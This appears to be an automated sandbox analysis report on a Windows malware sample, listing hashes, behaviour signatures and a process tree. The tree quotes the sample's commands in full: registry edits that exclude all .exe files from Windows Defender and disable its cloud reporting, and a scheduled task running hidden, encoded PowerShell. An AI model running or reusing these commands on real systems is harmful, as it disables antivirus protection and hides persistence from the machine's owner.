Analysis
-
max time kernel
400s -
max time network
426s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
27/11/2022, 20:12
General
-
Target
tmp.exe
-
Size
7.3MB
-
MD5
96c8cf366a208bb8c718c8adb8fe8f09
-
SHA1
523c74fd08b2b48f7d9e2f1ded880b3395b7fd09
-
SHA256
d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c
-
SHA512
a2bb85b49fd64e3b5d372f1f23c1826233e6ceddf66ec1ea6eae959888e9471de4e602638df1936e7bf69687bf0ee164fb7b94e40c15edce2b31dd47c0d3d5b1
-
SSDEEP
196608:91O7zHr+QgWi5Hv2fnrwPoi3mzXM0GWZ61mLPwR:3O7/+fWQP2TwPoGGZY1DR
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Suspicious use of WriteProcessMemory 36 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSD0CE.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFAC.tmp\Install.exe.\Install.exe /S /site_id "757674"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnWobqWGs" /SC once /ST 05:22:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnWobqWGs"4⤵
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5b73a2867ddadf6e023cf92a8b935e60b
SHA1e4e68805fb8916034c6bb8413178e971c8254a15
SHA256c00e6919b64ebabbe4da38e2ea291699f3ed5dbe16f4c3935e3f3f688e75e959
SHA5125921491a5093943621a82114c38fe2eec3b7e03b473fbb355d28f32e7c710c5c02483ce1c7ea3991f40de262f02a652272cab565a1f1ce34afad047217080dec
-
Filesize
6.3MB
MD5b73a2867ddadf6e023cf92a8b935e60b
SHA1e4e68805fb8916034c6bb8413178e971c8254a15
SHA256c00e6919b64ebabbe4da38e2ea291699f3ed5dbe16f4c3935e3f3f688e75e959
SHA5125921491a5093943621a82114c38fe2eec3b7e03b473fbb355d28f32e7c710c5c02483ce1c7ea3991f40de262f02a652272cab565a1f1ce34afad047217080dec
-
Filesize
6.7MB
MD5ff49c9f567657433469094f1e033b55c
SHA12ab779a62dc28d54f479f516a6d566490821611b
SHA256a7ae7aa0d33ae421777c9bce6f76d1051eda7115d1d9ca8d4eed34be29b2033c
SHA51208c348e3922e774a4ed26f436e45b2331a25b1c9db72dad118ab463981cb83c122e830c17f059de5c9984e9c3b9e4ee545feb067783da73f80e00d81d508f64c
-
Filesize
6.7MB
MD5ff49c9f567657433469094f1e033b55c
SHA12ab779a62dc28d54f479f516a6d566490821611b
SHA256a7ae7aa0d33ae421777c9bce6f76d1051eda7115d1d9ca8d4eed34be29b2033c
SHA51208c348e3922e774a4ed26f436e45b2331a25b1c9db72dad118ab463981cb83c122e830c17f059de5c9984e9c3b9e4ee545feb067783da73f80e00d81d508f64c
-
Filesize
11.4MB